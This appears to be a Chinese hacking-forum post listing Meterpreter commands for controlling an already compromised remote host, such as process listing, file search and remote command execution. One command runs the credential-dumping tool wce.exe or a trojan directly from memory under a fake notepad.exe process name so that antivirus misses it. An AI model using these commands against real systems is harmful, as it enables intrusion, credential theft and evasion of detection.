请选择 进入手机版 | 继续访问电脑版
设为首页收藏本站 今天是: 2020-11-29    美好的一天,从现在开始
开启辅助访问      
切换到窄版

Waylee黑技术

 找回密码
 注册会员
搜索
热搜: 天龙 运维 kali
查看: 670|回复: 0
收起左侧

通过meterpreter远程代码执行的命令

[复制链接]

203

主题

232

帖子

942

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
942
发表于 2020-7-10 22:27:48 | 显示全部楼层 |阅读模式
sysinfo
命令为显示远程主机的系统信息、结构、语言等新。
execute
在目标主机上执行一个命令,其中“execute -h”显示帮助信息。-f为执行要运行的命令。
我们运行运行目标主机上的记事本程序 execute -f notepad.exe
execute -i -f cmd.exe可以达到的效果跟使用shell命令一样了,内容会回显过来,可以直接输入cmd命令了。
在目标主机内存中直接执行我们攻击主机上的攻击程序,比如wce.exe,又比如木马等,这样可以避免攻击程序存储到目标主机硬盘上被发现或被查杀。
execute  -H -m -d notepad.exe-f  wce.exe -a "-o wce.txt"
-d 在目标主机执行时显示的进程名称(用以伪装)
-m 直接从内存中执行
"-o wce.txt"是wce.exe的运行参数
ps
显示目标计算机进程信息
idletime
显示目标机器截止到当前无操作命令的时间。
search
“search  -f aa.exe” 查看目标机中在当前目录以及当前的子目录中有没有a.txt这个文件,有则显示出其路径。
“search –f l*.txt c:\\pp”为显示出c:\\pp下及pp文件夹下所有的子文件下所有以l开头的txt文件,若有此类文件,则返回其路径和其大小。
edit
调用vi编辑器,对目标主机上的文件进行修改
ipconfig/ifconfig
显示网络接口的关键信息,包括 IP 地址

高级模式
您需要登录后才可以回帖 登录 | 注册会员

本版积分规则

为兴趣而生,注册一起交流。 立即登录云玩 立即注册

QQ|手机版|Waylee黑技术 ( 浙ICP备15015590号-1 )

|浙公网安备33048102000118号

GMT+8, 2020-11-29 15:08 , Processed in 0.065011 second(s), 26 queries .

Powered by Discuz! X3.4 Licensed

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表